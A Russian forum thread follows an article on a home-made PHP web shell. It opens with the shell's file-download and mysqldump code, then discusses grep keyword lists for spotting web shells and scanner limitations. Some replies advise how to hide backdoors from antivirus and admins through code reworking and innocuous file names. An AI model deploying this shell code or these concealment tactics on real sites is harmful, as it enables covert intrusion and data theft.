    {$b2('mysqldump --user='.$user.' --password='.$pass.' --host='.$host.' '.$name.' > file.zip');echo 'Database access<br>';}
}
?>


<?php
 
if(isset($_POST['downl'])){
$file = $_POST['files'];
  if (file_exists($file)) {
  
    if (ob_get_level()) {
      ob_end_clean();
    }   
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename=' . basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
  } else{ echo '<p style="color: red">'.'File '.$file.' not exist!'.'</p>';
}
}
?>



</body>
</html>

Модифицируйте на своё усмотрение :-)
 
Хорошая статья, хотелось бы еще почитать о том как чистят веб-шеллы. Не прибегая, к созданию своего.

Вообще принцип похожий как и у сканеров и зная те подходы обфускации, какие описывал автор, можно состряпать простой скриптец, который будет по ключевым словам содержимого исполняемых файлов на сервере искать Web-шеллы. Берем слово exec и далее все варианты его обфускации для конкатинации строк:
$a1 = 'e'.'xec';
$a2 = 'ex'.'ec';
$a3 = 'exe'.'c';
и т.д. Так можно проделать со всеми командами для php и других языков.
пример - такого Python скрипта.
Есть и базами сигнатур проекты на гите:
Detector.php
PHP-Shell-Detector

Так же есть еще интересный способ обнаружения web-шеллов, это по логам самого веб-сервера. Берешь логи, загоняешь в Elasticsearch и анализируешь их, смотришь по времени создания файлов, по количеству обращений к файлам на веб-сервере, по длине ответа при обращении к одному и тому же файлу и т.д.
 
Берем слово exec и далее все варианты его обфускации для конкатинации строк:
$a1 = 'e'.'xec';
$a2 = 'ex'.'ec';
$a3 = 'exe'.'c';
Это плохой вариант поиска, так никто не ищет. Не будет же никто искать одну букву, если сделать так $a1 = 'e'.'x'.'e'.'c';

А вот сканеры которые вы привели, будут хорошо искать, в отличии от антивирусов. Самое слабое звено это сами запросы GET, POST, REQUEST... Я об этом писал:
На самом деле, чтобы было совсем круто, нужно убрать все упоминания base64 и POST, иначе можно просто легко отгрепать по ключевикам вручную.

Софт это всегда хорошо, но вообще правильный админ палит и по файлам, отгрепав ключевики типа system|exec|shell_exec|passthru|proc_open|popen|curl_exec|curl_multi_exec|parse_ini_file|show_source.... и т.д., и по логам, ища whoami, id, ls, pwd... и т.д. Это очень эффективно, главное наработанный список иметь.

Борьба безопасников и безобразников вечная ) Находчивость поражает - вместо шеллов загрузчики, подгружающие шелл со стороннего сервера при обращении к загрузчику. Или шелл, состоящий из нескольких файлов, которые по отдельности подозрений не вызывают. А ещё есть мини-шеллы не оставляющие в логах никаких запросов. В общем "голь на выдумки хитра" )
 
Это плохой вариант поиска, так никто не ищет. Не будет же никто искать одну букву, если сделать так $a1 = 'e'.'x'.'e'.'c';

А вот сканеры которые вы привели, будут хорошо искать, в отличии от антивирусов. Самое слабое звено это сами запросы GET, POST, REQUEST... Я об этом писал:


Софт это всегда хорошо, но вообще правильный админ палит и по файлам, отгрепав ключевики типа system|exec|shell_exec|passthru|proc_open|popen|curl_exec|curl_multi_exec|parse_ini_file|show_source.... и т.д., и по логам, ища whoami, id, ls, pwd... и т.д. Это очень эффективно, главное наработанный список иметь.

Борьба безопасников и безобразников вечная ) Находчивость поражает - вместо шеллов загрузчики, подгружающие шелл со стороннего сервера при обращении к загрузчику. Или шелл, состоящий из нескольких файлов, которые по отдельности подозрений не вызывают. А ещё есть мини-шеллы не оставляющие в логах никаких запросов. В общем "голь на выдумки хитра" )

Приветствую! Спасибо за статью!

Так как есть опыт лечений сайтов, после"шаловливых действий", замечу:

1) Как только ваш скрипт попадет в руки аналитика при работе с сайтом - он появится в антивирусных базах и потеряет свое преимущество. Выход: постоянная модификация кода (см. чуть ниже в п.3), обфускация (здесь не однозначно, обфусцированный код часто ловится), не выкладывать код в паблик (надеюсь, что для использования в личных целях - у вас есть отдельный скрипт =).

2) Ai-bolit - неплохой софт. Частенько за ним наблюдается False Positive, особенно в параноидальном режиме, бывает разработчики долго не обновляют базы (кстати, только сейчас увидел, что с февраля месяца 2019, буквально недавно появилась версия ai-bolit-hoster). Внешними сканерами, типа rescan.pro - при поиске вредоносов, пользоваться практически бесполезно, особенно, если бэкдор закрыт авторизацией. Если все же хочется, то для внешнего сканирования я бы рекомендовал использовать Quttera или Sucuri.

3) Про антивирусы, сканеры, работающие по файлам (хостер-версии или те, которые сами загружаем на сервер для проверки). В большинстве случаев, антивирусные базы работают за счет регулярных выражений, на основе поведенческого анализа - мне еще не встречались =) Поэтому, если мы возьмем какой-нибудь известный бэкдор и как следует поработаем над кодом, то скорее всего не будем обнаружены + существуют различные ограничения для таких антивирусов, например, могут не сканировать файлы больше определенного размера, не сканить .jpg, файлы с правами 000 и т.д. и т.п.

Исходя из этого, лично мое мнение - самописный бэкдор хорошо иметь, но только если вероятность того, что его исходный код попадет в чужие руки - минимален. Соответственно, в легальных целях после теста мы удалим свой бэкдор, в нелегальных, скорее всего, бэкдор найдут. Также, если пришли с благими намерениями, в 90% случаев, достаточно использовать две софтины без звонилок - webconsole и adminer.
 
  • Нравится
Реакции: SlipX и explorer
Это плохой вариант поиска, так никто не ищет. Не будет же никто искать одну букву, если сделать так $a1 = 'e'.'x'.'e'.'c';

А вот сканеры которые вы привели, будут хорошо искать, в отличии от антивирусов. Самое слабое звено это сами запросы GET, POST, REQUEST... Я об этом писал:


Софт это всегда хорошо, но вообще правильный админ палит и по файлам, отгрепав ключевики типа system|exec|shell_exec|passthru|proc_open|popen|curl_exec|curl_multi_exec|parse_ini_file|show_source.... и т.д., и по логам, ища whoami, id, ls, pwd... и т.д. Это очень эффективно, главное наработанный список иметь.

Борьба безопасников и безобразников вечная ) Находчивость поражает - вместо шеллов загрузчики, подгружающие шелл со стороннего сервера при обращении к загрузчику. Или шелл, состоящий из нескольких файлов, которые по отдельности подозрений не вызывают. А ещё есть мини-шеллы не оставляющие в логах никаких запросов. В общем "голь на выдумки хитра" )

Добрый день, упустил по тексту, Вы свой шел загрузили с помощью чужого шелла или как?
 
Добрый день, упустил по тексту, Вы свой шел загрузили с помощью чужого шелла или как?

Именно так, (читайте статью со строки "История одного взлома") поэтому лучше не давать названия для шеллов, которые есть во всех word-листах. Пока на локалке тестите, то конечно называйте как угодно. Но вместе с тем, плохими названиями будут что-то вроде fhlpsn.php так как это бросается в глаза при беглом просмотре директорий.

Хорошие варианты это встраивание кода в легитимный файл типа index.php, или назвав с изменением одной буквы какой-то имеющийся файл. Или дав название, не бросающееся в глаза, но очень похожее на "правильный файл", например snippet.php
 
1) Как только ваш скрипт попадет в руки аналитика при работе с сайтом - он появится в антивирусных базах и потеряет свое преимущество. Выход: постоянная модификация кода (см. чуть ниже в п.3), обфускация (здесь не однозначно, обфусцированный код часто ловится), не выкладывать код в паблик (надеюсь, что для использования в личных целях - у вас есть отдельный скрипт =).

Да, конечно, я выложил паблик-версию, и написал где слабые места. POST запросы спасут только от неопытного админа, картинку при доработанных настройках сервера я приводил в статье - все запросы как на ладони. Кому надо, тот доработает. Для того, что хочет и может поправить php-код, это не проблема.

У самого версия не оставляющая в логах никаких запросов, но так как далеко не все на форуме белые шляпы, то выкладывать такое неразумно. Да и применение ограничено - только если нужно пронаблюдать за злоумышленником, и при этом самому не спалиться. Во всех остальных случаях этого не требуется, так как заказчик и так предоставляет все доступы.

Спасибо, Quttera не использовал, посмотрю что за тулза. В моём понятии лучше рук ничего нет, но софт всегда использовать нужно для предварительной проверки, особенно когда бывают ресурсы забитые вредоносами под завязку.
 
Да, конечно, я выложил паблик-версию, и написал где слабые места. POST запросы спасут только от неопытного админа, картинку при доработанных настройках сервера я приводил в статье - все запросы как на ладони. Кому надо, тот доработает. Для того, что хочет и может поправить php-код, это не проблема.

У самого версия не оставляющая в логах никаких запросов, но так как далеко не все на форуме белые шляпы, то выкладывать такое неразумно. Да и применение ограничено - только если нужно пронаблюдать за злоумышленником, и при этом самому не спалиться. Во всех остальных случаях этого не требуется, так как заказчик и так предоставляет все доступы.

Спасибо, Quttera не использовал, посмотрю что за тулза. В моём понятии лучше рук ничего нет, но софт всегда использовать нужно для предварительной проверки, особенно когда бывают ресурсы забитые вредоносами под завязку.

Согласен)

Quttera, на мой взгляд, очень эффективна. Но опять же, внешнее сканирование годится только для обнаружения внедрения js, редиректов. Ну а там два пути, или искать по файлам или в БД.

Про руки и софт для предварительного обнаружения - полностью согласен. Софт также бывает полезен для автоматической чистки + наличием файлового менеджера (такой есть, платный, рекламировать не буду). А затем уже да, ручная проверка по дате, логи, ssh (не всегда есть, выручает webconsole), чистка через регулярки и прочий блэкджек =)
 
Только что просканил заражённый сайт, имеющий на борту несколько шеллов, ни один не обнаружился. Видимо не достаточно эффективный сканер всё-таки.

Посмотреть вложение 36746

Хм. Может они недектируются снаружи? Если так - то не один из внешних сканеров не обнаружит. Могу глянуть ради интереса, почему не видит, если сбросите ссылку в лс.
 
Там шеллы исключительно на POST запросах. У меня 2 тестовых ресурса, оба проверял, не видит. Никакой обфускации на некоторых шеллах даже нет. Впрочем, я уже для себя выяснил, что самый эффективный софт самописный (с гитхаба того же), а не корпоративный, или от антивирусных компаний.

В реальности три четверти сайтов либо не имеют админов (заказали сайт и на этом всё), или админы из разряда обновить статьи и залить картинки. Поэтому даже самые очевидные вредоносы на многих ресурсах могут жить весьма долго (если конечно не беспокоят хостера рассылкой спама и т.п.).
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!